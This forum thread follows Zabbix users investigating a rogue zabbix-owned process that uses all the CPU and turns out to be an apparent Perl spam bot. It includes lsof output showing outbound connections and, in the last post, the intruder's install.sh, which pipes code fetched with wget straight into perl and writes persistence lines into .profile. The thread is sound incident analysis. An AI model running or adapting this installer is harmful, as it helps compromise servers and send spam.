Zabbix process taking 100% CPU

  • theWoosh
    Junior Member
    • Nov 2015
    • 20

    #1

    Zabbix process taking 100% CPU

    Hi
    I am running an Ubuntu 14.04 server with Zabbix server and agent 2.4.8.
    I have noticed an unnamed process, owned by the zabbix user, that is taking 100% CPU. If I stop zabbix-agent and zabbix-server it continues to run. When I kill it, it doesn't restart immediately or with a Zabbix restart, but I find it running again the next day.

    Can anyone suggest what I can do to understand and fix this?

    Many thanks
    Last edited by theWoosh; 13-01-2017, 14:06.
  • theWoosh
    Junior Member
    • Nov 2015
    • 20

    #2
    The process has restarted again (after being killed), but not immediately...
    htop shows:
    PID USER PRI NI VIRT RES SHR S CPU% MEM% TIME+ Command
    26327 zabbix 20 0 2478 4108 804 R 99.7% 0.1% 17h24:55
    ...no command displayed ...

    ppid is shown as 1 (from ps)

    no output from:
    #cat /proc/26327/cmdline

    how can I find out what this is about? any ideas?

    • theWoosh
      Junior Member
      • Nov 2015
      • 20

      #3
      Where is the zabbix system user password configured?

      Since this process is owned by the zabbix system user and I can't figure out how it is being spawned or what it is doing, I have changed the zabbix system user password and stopped Zabbix to see whether this prevents the problem until I have some way of establishing the cause...
      Last edited by theWoosh; 13-01-2017, 13:55.

      • theWoosh
        Junior Member
        • Nov 2015
        • 20

        #4
        Please note: corrected error in Zabbix version in this post...

        Hi, I made a mistake in the original post. I have corrected it to reflect the actual Zabbix version running on this server, which is 2.4.8.

        • Pada
          Senior Member
          • Apr 2012
          • 236

          #5
          Here are some other commands that may be useful in debugging it:
          # ls -la /proc/26327/exe
          # cat /proc/26327/status
          # lsof -n -p 26327

          Also, how often are you running the housekeeper?
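The three commands above can be wrapped into one helper for repeated use. This is only a minimal sketch, not something from the thread: `inspect_pid` and the `PROC_ROOT` override are hypothetical names introduced here, and it assumes a Linux /proc layout. Reading another user's exe and cwd links normally requires root.

```shell
#!/bin/sh
# Sketch: print basic facts about a process whose command line is blank.
# PROC_ROOT is a hypothetical override (defaults to /proc) so the function
# can also be pointed at a saved copy of a /proc/<pid> tree.
inspect_pid() {
    pid="$1"
    root="${PROC_ROOT:-/proc}"
    dir="$root/$pid"
    if [ ! -d "$dir" ]; then
        echo "no such process: $pid" >&2
        return 1
    fi
    # exe and cwd are symlinks to the binary and the working directory
    echo "exe: $(readlink "$dir/exe" 2>/dev/null || echo '?')"
    echo "cwd: $(readlink "$dir/cwd" 2>/dev/null || echo '?')"
    # cmdline is NUL-separated; read it rather than testing its size,
    # because files under /proc report a size of 0
    cmd=$(tr '\0' ' ' 2>/dev/null < "$dir/cmdline")
    if [ -n "$cmd" ]; then
        echo "cmdline: $cmd"
    else
        # a userspace process can blank its own argv, which shows up here
        echo "cmdline: (empty)"
    fi
    # parent PID and owner from the status file
    grep -E '^(PPid|Uid):' "$dir/status" 2>/dev/null
    return 0
}
```

Run as root with the PID from htop, for example `inspect_pid 26327`.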

          • theWoosh
            Junior Member
            • Nov 2015
            • 20

            #6
            Thanks for the suggestions - I will try them when/if the process restarts...
            Though please note that when I tried:
            #cat /proc/26327/cmdline
            ...there was no data returned

            The Housekeeping settings are as installed:
            Events and alerts
            Enable internal housekeeping yes

            Trigger data storage period (in days) 365
            Internal data storage period (in days) 365
            Network discovery data storage period (in days) 365
            Auto-registration data storage period (in days) 365

            IT services
            Enable internal housekeeping yes

            Data storage period (in days) 365

            Audit
            Enable internal housekeeping yes

            Data storage period (in days) 365
            User sessions
            Enable internal housekeeping yes

            Data storage period (in days) 365

            History
            Enable internal housekeeping yes

            Override item history period no

            Data storage period (in days) 90

            Trends
            Enable internal housekeeping

            Override item trend period no

            Data storage period (in days) 365

            • Pada
              Senior Member
              • Apr 2012
              • 236

              #7
              What is your "HousekeepingFrequency" in your zabbix_server.conf file?

              Though please note that when I tried:
              #cat /proc/26327/cmdline
              ...there was no data returned
              Did it return an empty result or an error? If it returned a result, the other commands I mentioned may be of use. Unfortunately you'll need to wait until this strange process starts again...

              • theWoosh
                Junior Member
                • Nov 2015
                • 20

                #8
                Thanks for helping...

                The housekeeping frequency is commented out in the zabbix_server.conf file...
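A quick way to confirm whether a setting is active or only present as a comment is to search for an uncommented `Key=value` line. The sketch below is illustrative only: `show_setting` is a hypothetical helper, and the config path in the usage note is the usual package location, which is an assumption and may differ on your system.

```shell
#!/bin/sh
# Sketch: print the uncommented "Key=value" line(s) for a setting,
# or say that the key is not set, in which case the built-in default applies.
show_setting() {
    key="$1"
    file="$2"
    grep -E "^[[:space:]]*${key}[[:space:]]*=" "$file" \
        || echo "$key is not set in $file (built-in default applies)"
}
```

For example: `show_setting HousekeepingFrequency /etc/zabbix/zabbix_server.conf`.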

                ...and I received no data back at all from cat /proc/26327/cmdline

                • theWoosh
                  Junior Member
                  • Nov 2015
                  • 20

                  #9
                  Zabbix has not been running for a couple of days and the rogue process has not returned.
                  I will leave it for a bit and then switch zabbix back on and see if it recurs.
                  I will miss having zabbix running but I can't run it if it is causing this somehow so any help would be useful...

                  • Pada
                    Senior Member
                    • Apr 2012
                    • 236

                    #10
                    So far the only CPU hog I've had with our Zabbix was stuck fping processes, which I now simply kill if they run for longer than a minute, using the following cron.d entry:
                    Code:
                    * * * * * root /usr/bin/killall --older-than 1m fping 2> /dev/null

                    • alex91
                      Junior Member
                      • Mar 2017
                      • 3

                      #11
                      Hi!
                      It looks like I'm facing a similar issue with Zabbix of the same version (2.4.8).

                      # ls -la /proc/4187/exe
                      lrwxrwxrwx 1 zabbix zabbix 0 Mar 6 00:39 /proc/4187/exe -> /usr/bin/perl
                      # lsof -n -p 4187
                      COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
                      (unknown) 4187 zabbix cwd DIR 0,22 220 525 /tmp/.b
                      (unknown) 4187 zabbix rtd DIR 253,1 4096 2 /
                      (unknown) 4187 zabbix txt REG 253,1 10416 1272 /usr/bin/perl
                      (unknown) 4187 zabbix mem REG 253,1 43416 1419 /usr/lib/perl/5.18.2/auto/Socket/Socket.so
                      (unknown) 4187 zabbix mem REG 253,1 18728 1425 /usr/lib/perl/5.18.2/auto/IO/IO.so
                      (unknown) 4187 zabbix mem REG 253,1 43368 8669 /lib/x86_64-linux-gnu/libcrypt-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 141574 8674 /lib/x86_64-linux-gnu/libpthread-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 1071552 8665 /lib/x86_64-linux-gnu/libm-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 14664 8668 /lib/x86_64-linux-gnu/libdl-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 1840928 8684 /lib/x86_64-linux-gnu/libc-2.19.so
                      (unknown) 4187 zabbix mem REG 253,1 1608280 1273 /usr/lib/libperl.so.5.18.2
                      (unknown) 4187 zabbix mem REG 253,1 149120 8675 /lib/x86_64-linux-gnu/ld-2.19.so
                      (unknown) 4187 zabbix 0w CHR 1,3 0t0 6 /dev/null
                      (unknown) 4187 zabbix 1w CHR 1,3 0t0 6 /dev/null
                      (unknown) 4187 zabbix 2w CHR 1,3 0t0 6 /dev/null
                      (unknown) 4187 zabbix 3u IPv4 7326407 0t0 TCP 185.117.155.200:46912->138.68.80.133:http (ESTABLISHED)
                      (unknown) 4187 zabbix 6u unix 0xffff88007c9a0000 0t0 11397 socket
                      (unknown) 4187 zabbix 7u sock 0,8 0t0 7324905 can't identify protocol

                      # ls -la /tmp/.b
                      total 32
                      drwxr-xr-x 3 zabbix zabbix 220 Mar 9 17:39 .
                      drwxrwxrwt 7 root root 140 Mar 9 17:53 ..
                      -rw-r--r-- 1 zabbix zabbix 13 Mar 8 10:52 body.html
                      -rw-r--r-- 1 zabbix zabbix 397 Nov 16 2015 install.sh
                      -rw-r--r-- 1 zabbix zabbix 29 Jan 8 21:56 list.txt
                      -rw-rw-r-- 1 zabbix zabbix 13 Mar 8 10:52 nick.txt
                      drwxr-xr-x 5 zabbix zabbix 100 Jun 5 2016 perl5
                      -rw-r--r-- 1 zabbix zabbix 172 Nov 16 2015 .profile
                      -rw-r--r-- 1 zabbix zabbix 1524 Nov 16 2015 send2.pl
                      -rw-r--r-- 1 zabbix zabbix 112 Nov 16 2015 send.sh
                      -rw-rw-r-- 1 zabbix zabbix 74 Mar 8 10:52 ss

                      It looks like it is running a Perl script of some sort that takes email addresses from list.txt and sends them the contents of body.html.
                      body.html (as well as nick.txt) contains only the string "Linux|460513".
                      How is this connected to Zabbix? Is this a spam bot?

                      • theWoosh
                        Junior Member
                        • Nov 2015
                        • 20

                        #12
                        Hi Alex91
                        Zabbix is running again, and the process is again taking 100% of the CPU. It looks like exactly the same problem as yours. I get the following (which looks extremely similar):

                        # ls -la /proc/12928/exe
                        lrwxrwxrwx 1 zabbix zabbix 0 Mar 13 06:39 /proc/12928/exe -> /usr/bin/perl

                        # cat /proc/12928/status
                        Name:
                        State: R (running)
                        Tgid: 12928
                        Ngid: 0
                        Pid: 12928
                        PPid: 1
                        TracerPid: 0
                        Uid: 115 115 115 115
                        Gid: 125 125 125 125
                        FDSize: 64
                        Groups: 125
                        VmPeak: 24788 kB
                        VmSize: 24788 kB
                        VmLck: 0 kB
                        VmPin: 0 kB
                        VmHWM: 4200 kB
                        VmRSS: 4116 kB
                        VmData: 3464 kB
                        VmStk: 136 kB
                        VmExe: 8 kB
                        VmLib: 4684 kB
                        VmPTE: 64 kB
                        VmSwap: 0 kB
                        Threads: 1
                        SigQ: 0/47573
                        SigPnd: 0000000000000000
                        ShdPnd: 0000000000000000
                        SigBlk: 0000000000000000
                        SigIgn: 0000000000015083
                        SigCgt: 0000000180000000
                        CapInh: 0000000000000000
                        CapPrm: 0000000000000000
                        CapEff: 0000000000000000
                        CapBnd: 0000001fffffffff
                        Seccomp: 0
                        Cpus_allowed: ff
                        Cpus_allowed_list: 0-7
                        Mems_allowed: 00000000,00000001
                        Mems_allowed_list: 0
                        voluntary_ctxt_switches: 16
                        nonvoluntary_ctxt_switches: 5360898


                        # lsof -n -p 12928
                        COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
                        (unknown) 12928 zabbix cwd DIR 8,1 4096 147462 /tmp/.b
                        (unknown) 12928 zabbix rtd DIR 8,1 4096 2 /
                        (unknown) 12928 zabbix txt REG 8,1 10416 786544 /usr/bin/perl
                        (unknown) 12928 zabbix mem REG 8,1 43416 786644 /usr/lib/perl/5.18.2/auto/Socket/Socket.so
                        (unknown) 12928 zabbix mem REG 8,1 18728 786663 /usr/lib/perl/5.18.2/auto/IO/IO.so
                        (unknown) 12928 zabbix mem REG 8,1 43368 920228 /lib/x86_64-linux-gnu/libcrypt-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 141574 920238 /lib/x86_64-linux-gnu/libpthread-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 1071552 920219 /lib/x86_64-linux-gnu/libm-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 14664 920224 /lib/x86_64-linux-gnu/libdl-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 1840928 920250 /lib/x86_64-linux-gnu/libc-2.19.so
                        (unknown) 12928 zabbix mem REG 8,1 1608280 786563 /usr/lib/libperl.so.5.18.2
                        (unknown) 12928 zabbix mem REG 8,1 149120 920239 /lib/x86_64-linux-gnu/ld-2.19.so
                        (unknown) 12928 zabbix 0w CHR 1,3 0t0 1029 /dev/null
                        (unknown) 12928 zabbix 1w CHR 1,3 0t0 1029 /dev/null
                        (unknown) 12928 zabbix 2w CHR 1,3 0t0 1029 /dev/null
                        (unknown) 12928 zabbix 3u IPv4 8550373 0t0 TCP 5.57.57.18:35222->212.24.105.253:http (ESTABLISHED)
                        (unknown) 12928 zabbix 6u unix 0xffff880002573fc0 0t0 2119769 socket
                        (unknown) 12928 zabbix 7u sock 0,7 0t0 8553877 can't identify protocol


                        # ls -la /tmp/.b
                        total 100
                        drwxr-xr-x 3 zabbix zabbix 4096 Mar 13 07:47 .
                        drwxrwxrwt 6 root root 53248 Mar 13 09:40 ..
                        -rw-r--r-- 1 zabbix zabbix 13 Mar 13 07:13 body.html
                        -rw-r--r-- 1 zabbix zabbix 397 Nov 16 2015 install.sh
                        -rw-rw-r-- 1 zabbix zabbix 28 Mar 13 07:13 list.txt
                        -rw-rw-r-- 1 zabbix zabbix 13 Mar 13 07:10 nick.txt
                        drwxr-xr-x 5 zabbix zabbix 4096 Jun 5 2016 perl5
                        -rw-r--r-- 1 zabbix zabbix 172 Nov 16 2015 .profile
                        -rw-rw-r-- 1 zabbix zabbix 74 Mar 13 07:47 qq
                        -rw-r--r-- 1 zabbix zabbix 1556 Nov 16 2015 send2.pl
                        -rw-r--r-- 1 zabbix zabbix 112 Nov 16 2015 send.sh
                        -rw-rw-r-- 1 zabbix zabbix 74 Mar 13 07:14 sq

                        Like yours, nick.txt just contains a string like Linux|nnnnnn, but list.txt contains: [email protected]

                        I am switching Zabbix off again for the time being as I don't understand this at all...

                        • alex91
                          Junior Member
                          • Mar 2017
                          • 3

                          #13
                          list.txt on my machine had just one Italian email in it too, but it was a different one from yours.
                          It also looks like this script needs some time to create the /tmp/.b folder. This morning I found it had been running since 2:30 am (so for 8 hours or so), but no temporary folder had been created (though all the other symptoms were the same).
                          For now I have killed the process and am thinking about writing a cron task that runs every 30 minutes, checks whether that thing is active, and kills it.
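The check-and-kill idea could be sketched roughly as below, matching on the working directory seen in the lsof output rather than on the (blank) process name. `pids_with_cwd` and the `PROC_ROOT` override are hypothetical names introduced for illustration. It assumes a Linux /proc and root privileges, and it would not catch a run that has not yet created /tmp/.b.

```shell
#!/bin/sh
# Sketch: list the PIDs whose current working directory is the given path.
# PROC_ROOT is a hypothetical override (defaults to /proc).
pids_with_cwd() {
    target="$1"
    root="${PROC_ROOT:-/proc}"
    for dir in "$root"/[0-9]*; do
        [ -d "$dir" ] || continue
        # the cwd link is unreadable without sufficient privileges; skip those
        cwd=$(readlink "$dir/cwd" 2>/dev/null) || continue
        if [ "$cwd" = "$target" ]; then
            # strip the leading path so only the PID is printed
            echo "${dir##*/}"
        fi
    done
}
```

A script run from cron could then do something like `pids_with_cwd /tmp/.b | xargs -r kill` (the `-r` flag is GNU xargs and skips the kill when nothing matches).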

                          It would be nice if somebody with more advanced knowledge of unix can help us figure out what's going on.

                          • theWoosh
                            Junior Member
                            • Nov 2015
                            • 20

                            #14
                            Weird... why would it send a one-line message to a strange Italian email address? And why would that kill the CPU? Is this just a broken bit of code, or is it malicious? Have you checked your mail queue?

                            • theWoosh
                              Junior Member
                              • Nov 2015
                              • 20

                              #15
                              ...and it doesn't look good that it has installed a perl5 directory under /tmp/.b. On mine this contains cpanm and instmodsh.
                              The install.sh that also resides in /tmp/.b contains the following (and explains how the Perl files got there):

                              #!/bin/bash
                              this=$(pwd)
                              declare -x HOME="$this"

                              wget -O- --no-check-certificate http://cpanmin.us | perl - -l ~/perl5 App::cpanminus local::lib
                              eval `perl -I ~/perl5/lib/perl5 -Mlocal::lib`
                              echo 'eval `perl -I ~/perl5/lib/perl5 -Mlocal::lib`' >> ~/.profile
                              echo 'export MANPATH=$HOME/perl5/man:$MANPATH' >> ~/.profile
                              cpanm install Parallel::ForkManager Mail::Sendmail
